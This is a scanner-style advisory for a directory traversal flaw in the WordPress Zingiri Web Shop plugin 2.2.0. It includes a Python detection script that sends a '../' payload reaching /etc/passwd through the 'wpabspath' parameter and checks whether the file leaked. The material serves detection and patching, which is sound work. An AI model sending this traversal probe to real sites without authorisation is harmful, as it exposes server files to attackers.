Summary
This host is installed with the WordPress Zingiri Web Shop plugin and is prone to a file inclusion vulnerability (directory traversal via the 'wpabspath' parameter).
Impact
Successful exploitation could allow remote, unauthenticated attackers to traverse directories and read arbitrary files on the affected application.
Impact Level: Application
Solution
Upgrade to WordPress Zingiri Web Shop Plugin Version 2.2.1 or later.
For updates refer to http://wordpress.org/extend/plugins/zingiri-web-shop/download/
Insight
The flaw is due to improper validation of user-supplied input passed via the 'wpabspath' parameter to /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php, which allows attackers to read arbitrary files by supplying '../' (dot dot) sequences.
Affected
WordPress Zingiri Web Shop Plugin Version 2.2.0
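The following is an added example, not part of the original advisory or the plugin's code. It shows the two checks a scanner would run for this issue: a version check against the fixed release named above, and an active probe that sends the '../' traversal described in the Insight through the 'wpabspath' parameter and decides from the response whether a file was read. The request method (GET), the traversal depth, the choice of /etc/passwd as the target file and the sample responses are all assumptions constructed for the example; the path and parameter name are the ones named in the advisory.

```python
import re
import urllib.parse
import urllib.request

# Path and parameter named in the advisory.
VULN_PATH = "/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"
PARAM = "wpabspath"

# First release the advisory names as fixed.
FIXED_VERSION = (2, 2, 1)

# Constructed traversal payload. The advisory says '../' sequences in
# wpabspath read arbitrary files; depth and target file are assumptions.
TRAVERSAL = "../" * 8 + "etc/passwd"

# passwd-style record: name:pw:uid:gid:... at the start of a line.
PASSWD_RE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:]*:\d+:\d+:", re.MULTILINE)


def parse_version(text: str) -> tuple:
    """Turn '2.2.0' into (2, 2, 0) for a numeric comparison."""
    return tuple(int(part) for part in text.strip().split("."))


def is_affected(version: str) -> bool:
    """Versions below the fixed release are reported as affected."""
    return parse_version(version) < FIXED_VERSION


def build_probe_url(base_url: str, payload: str = TRAVERSAL) -> str:
    """Assumption: the parameter is read from the query string (GET)."""
    base = base_url.rstrip("/")
    query = urllib.parse.urlencode({PARAM: payload})
    return f"{base}{VULN_PATH}?{query}"


def looks_like_passwd(body: str) -> bool:
    """Require at least two records so a single stray 'x:y:1:2:' line
    in an error page does not trigger a false positive."""
    return len(PASSWD_RE.findall(body)) >= 2


def classify_response(status: int, body: str) -> str:
    """Map an HTTP response to a scanner verdict."""
    if status != 200:
        # 403/404/500 etc.: WAF, missing plugin or fatal error; not proof
        # either way, so do not report "not vulnerable" on this alone.
        return "inconclusive"
    return "vulnerable" if looks_like_passwd(body) else "not_vulnerable"


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Send the traversal probe and classify the result (network call)."""
    req = urllib.request.Request(build_probe_url(base_url))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read().decode("utf-8", "replace"))


# Constructed sample responses for offline use.
SAMPLE_LEAK = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
SAMPLE_ERROR = (
    "<br />Warning: include(../../../../../../../../etc/passwd): "
    "failed to open stream in init.inc.php on line 3<br />"
)

if __name__ == "__main__":
    print(build_probe_url("https://shop.example"))
    print(classify_response(200, SAMPLE_LEAK))   # vulnerable
    print(classify_response(200, SAMPLE_ERROR))  # not_vulnerable
    print(is_affected("2.2.0"), is_affected("2.2.1"))
```

The version check is the cheap, passive path (read the plugin's version from its readme and compare); the active probe confirms exploitability but should only be run where testing is authorised, and a non-200 reply is deliberately reported as inconclusive rather than safe.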
References
Updated on 2015-03-25
Severity
CVSS Base Score: 7.5
CVSS Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P